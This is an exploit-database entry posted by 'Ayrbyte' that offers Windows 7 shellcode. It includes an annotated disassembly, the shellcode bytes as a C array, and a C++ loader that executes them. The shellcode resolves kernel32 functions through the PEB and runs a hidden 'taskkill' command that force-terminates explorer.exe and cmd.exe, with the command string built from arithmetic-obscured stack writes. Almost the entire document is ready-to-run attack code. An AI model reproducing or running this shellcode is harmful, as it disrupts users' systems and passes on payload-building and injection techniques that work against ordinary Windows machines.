Windows7 Force Terminate Explorer Shellcode - 255 chars

2013-04-21T00:00:00
ID 1337DAY-ID-20679
Type zdt
Reporter Ayrbyte
Modified 2013-04-21T00:00:00

Description

Exploit for win32 platform in category shellcode

                                        
                                            /*------------------------------------------------
==[ By Ayrbyte ]======[ Geng Simbe @ TKJ 1 Club ]========================================
Greets To : Adit Groundd SAndd Notte, Agos Wahyo, Aguenkk Rebel Black Sweet,
Ahmad Bagoes, Alvin Putra Marcdyto, Arieb Shezhaniea, Aviep Autiez, Chusnie Mubarok,
Cumigh Gokil On Üç, Dapat Di Hubungi, De Ayiph Ever, Dwi J Andreansyah, Jack PYing,
Khuluq Gomez, Ola Amor Arpaz, Pewe, Q-blueshiierezpector Screamoalltheway Aparatkeparat, 
Raden Mas Koko, Rivan Ardiansyah, Rizqi Bogez, Rony C'Penghianat X Ciinta, Sukrex Dreizehn, 
Syafi'i, and all Tkj 1 Club Family... ^_^
=========================================================================================
--------------------------------------------------
    title : win32/7 Ultimate, Force Terminate Explorer Shellcode (255 chars)
    Author: Ayrbyte
    Category: local
    Tested on: Windows7 Ultimate
    Code : c++
    Fb : fb.me/Ayrbyte 
--------------------------------------------------
00401000 > $ 33F6           XOR ESI,ESI
00401002   . 33C9           XOR ECX,ECX
00401004   . 64:8B71 30     MOV ESI,DWORD PTR FS:[ECX+30]
00401008   . 8B76 0C        MOV ESI,DWORD PTR DS:[ESI+C]
0040100B   . 8B76 1C        MOV ESI,DWORD PTR DS:[ESI+1C]
0040100E   . 33DB           XOR EBX,EBX
00401010   > 43             INC EBX
00401011   . 8B6E 08        MOV EBP,DWORD PTR DS:[ESI+8]
00401014   . 8B7E 20        MOV EDI,DWORD PTR DS:[ESI+20]
00401017   . 8B36           MOV ESI,DWORD PTR DS:[ESI]
00401019   . B8 11111111    MOV EAX,11111111
0040101E   . B9 14111111    MOV ECX,11111114
00401023   . 2BC8           SUB ECX,EAX
00401025   . 8BD1           MOV EDX,ECX
00401027   . 3BDA           CMP EBX,EDX
00401029   .^75 E5          JNZ SHORT messageb.00401010
0040102B   . B9 73311111    MOV ECX,11113173
00401030   . 2BC8           SUB ECX,EAX
00401032   . 03E9           ADD EBP,ECX
00401034   . 8BD4           MOV EDX,ESP
00401036   . B9 10211111    MOV ECX,11112110
0040103B   . 2BC8           SUB ECX,EAX
0040103D   . 2BD1           SUB EDX,ECX
0040103F   . B9 636D6420    MOV ECX,20646D63
00401044   . 890A           MOV DWORD PTR DS:[EDX],ECX
00401046   . B9 2F6B2074    MOV ECX,74206B2F
0040104B   . 894A 04        MOV DWORD PTR DS:[EDX+4],ECX
0040104E   . B9 61736B6B    MOV ECX,6B6B7361
00401053   . 894A 08        MOV DWORD PTR DS:[EDX+8],ECX
00401056   . B9 696C6C20    MOV ECX,206C6C69
0040105B   . 894A 0C        MOV DWORD PTR DS:[EDX+C],ECX
0040105E   . B9 2F696D20    MOV ECX,206D692F
00401063   . 894A 10        MOV DWORD PTR DS:[EDX+10],ECX
00401066   . B9 6578706C    MOV ECX,6C707865
0040106B   . 894A 14        MOV DWORD PTR DS:[EDX+14],ECX
0040106E   . B9 6F726572    MOV ECX,7265726F
00401073   . 894A 18        MOV DWORD PTR DS:[EDX+18],ECX
00401076   . B9 2E657865    MOV ECX,6578652E
0040107B   . 894A 1C        MOV DWORD PTR DS:[EDX+1C],ECX
0040107E   . B9 202F696D    MOV ECX,6D692F20
00401083   . 894A 20        MOV DWORD PTR DS:[EDX+20],ECX
00401086   . B9 20636D64    MOV ECX,646D6320
0040108B   . 894A 24        MOV DWORD PTR DS:[EDX+24],ECX
0040108E   . B9 2E657865    MOV ECX,6578652E
00401093   . 894A 28        MOV DWORD PTR DS:[EDX+28],ECX
00401096   . B9 31407711    MOV ECX,11774031
0040109B   . 2BC8           SUB ECX,EAX
0040109D   . 894A 2C        MOV DWORD PTR DS:[EDX+2C],ECX
004010A0   . 33DB           XOR EBX,EBX
004010A2   . 8BF4           MOV ESI,ESP
004010A4   . B9 65111111    MOV ECX,11111165
004010A9   . 2BC8           SUB ECX,EAX
004010AB   . 8D4E AC        LEA ECX,DWORD PTR DS:[ESI-54]
004010AE   . 51             PUSH ECX
004010AF   . 8D4E BC        LEA ECX,DWORD PTR DS:[ESI-44]
004010B2   . 51             PUSH ECX
004010B3   . 53             PUSH EBX
004010B4   . 53             PUSH EBX
004010B5   . B9 31131111    MOV ECX,11111331
004010BA   . 2BC8           SUB ECX,EAX
004010BC   . 51             PUSH ECX
004010BD   . 53             PUSH EBX
004010BE   . 53             PUSH EBX
004010BF   . 53             PUSH EBX
004010C0   . 52             PUSH EDX
004010C1   . 53             PUSH EBX
004010C2   . FFD5           CALL EBP
004010C4   . 33F6           XOR ESI,ESI
004010C6   . 33C9           XOR ECX,ECX
004010C8   . 64:8B71 30     MOV ESI,DWORD PTR FS:[ECX+30]
004010CC   . 8B76 0C        MOV ESI,DWORD PTR DS:[ESI+C]
004010CF   . 8B76 1C        MOV ESI,DWORD PTR DS:[ESI+1C]
004010D2   . 33DB           XOR EBX,EBX
004010D4   > 43             INC EBX
004010D5   . 8B6E 08        MOV EBP,DWORD PTR DS:[ESI+8]
004010D8   . 8B7E 20        MOV EDI,DWORD PTR DS:[ESI+20]
004010DB   . 8B36           MOV ESI,DWORD PTR DS:[ESI]
004010DD   . B8 11111111    MOV EAX,11111111
004010E2   . B9 13111111    MOV ECX,11111113
004010E7   . 2BC8           SUB ECX,EAX
004010E9   . 8BD1           MOV EDX,ECX
004010EB   . 3BDA           CMP EBX,EDX
004010ED   .^75 E5          JNZ SHORT messageb.004010D4
004010EF   . B8 11111111    MOV EAX,11111111
004010F4   . B9 37261411    MOV ECX,11142637
004010F9   . 2BC8           SUB ECX,EAX
004010FB   . 03E9           ADD EBP,ECX
004010FD   . FFD5           CALL EBP
------------------------------------------------ */
#include <iostream>
using namespace std;

char code[] = "\x33\xF6\x33\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x33"
"\xDB\x43\x8B\x6E\x08\x8B\x7E\x20\x8B\x36\xB8\x11\x11\x11\x11\xB9\x14"
"\x11\x11\x11\x2B\xC8\x8B\xD1\x3B\xDA\x75\xE5\xB9\x73\x31\x11"
"\x11\x2B\xC8\x03\xE9\x8B\xD4\xB9\x10\x21\x11\x11\x2B\xC8\x2B\xD1\xB9"
"\x63\x6D\x64\x20\x89\x0A\xB9\x2F\x6B\x20\x74\x89\x4A\x04\xB9"
"\x61\x73\x6B\x6B\x89\x4A\x08\xB9\x69\x6C\x6C\x20\x89\x4A\x0C\xB9\x2F"
"\x69\x6D\x20\x89\x4A\x10\xB9\x65\x78\x70\x6C\x89\x4A\x14\xB9"
"\x6F\x72\x65\x72\x89\x4A\x18\xB9\x2E\x65\x78\x65\x89\x4A\x1C\xB9\x20"
"\x2F\x69\x6D\x89\x4A\x20\xB9\x20\x63\x6D\x64\x89\x4A\x24\xB9"
"\x2E\x65\x78\x65\x89\x4A\x28\xB9\x31\x40\x77\x11\x2B\xC8\x89\x4A\x2C"
"\x33\xDB\x8B\xF4\xB9\x65\x11\x11\x11\x2B\xC8\x8D\x4E\xAC\x51"
"\x8D\x4E\xBC\x51\x53\x53\xB9\x31\x13\x11\x11\x2B\xC8\x51\x53\x53\x53"
"\x52\x53\xFF\xD5\x33\xF6\x33\xC9\x64\x8B\x71\x30\x8B\x76\x0C"
"\x8B\x76\x1C\x33\xDB\x43\x8B\x6E\x08\x8B\x7E\x20\x8B\x36\xB8\x11\x11"
"\x11\x11\xB9\x13\x11\x11\x11\x2B\xC8\x8B\xD1\x3B\xDA\x75\xE5"
"\xB8\x11\x11\x11\x11\xB9\x37\x26\x14\x11\x2B\xC8\x03\xE9\xFF\xD5";

int main(){printf("Shellcode Length is : %u\n",strlen(code));system("PAUSE");
    int (*_13)() = (int(*)())code; _13(); }
/*=================[ Geng Simbe @ TKJ 1 Club ]======*/

#  0day.today [2018-03-16]  #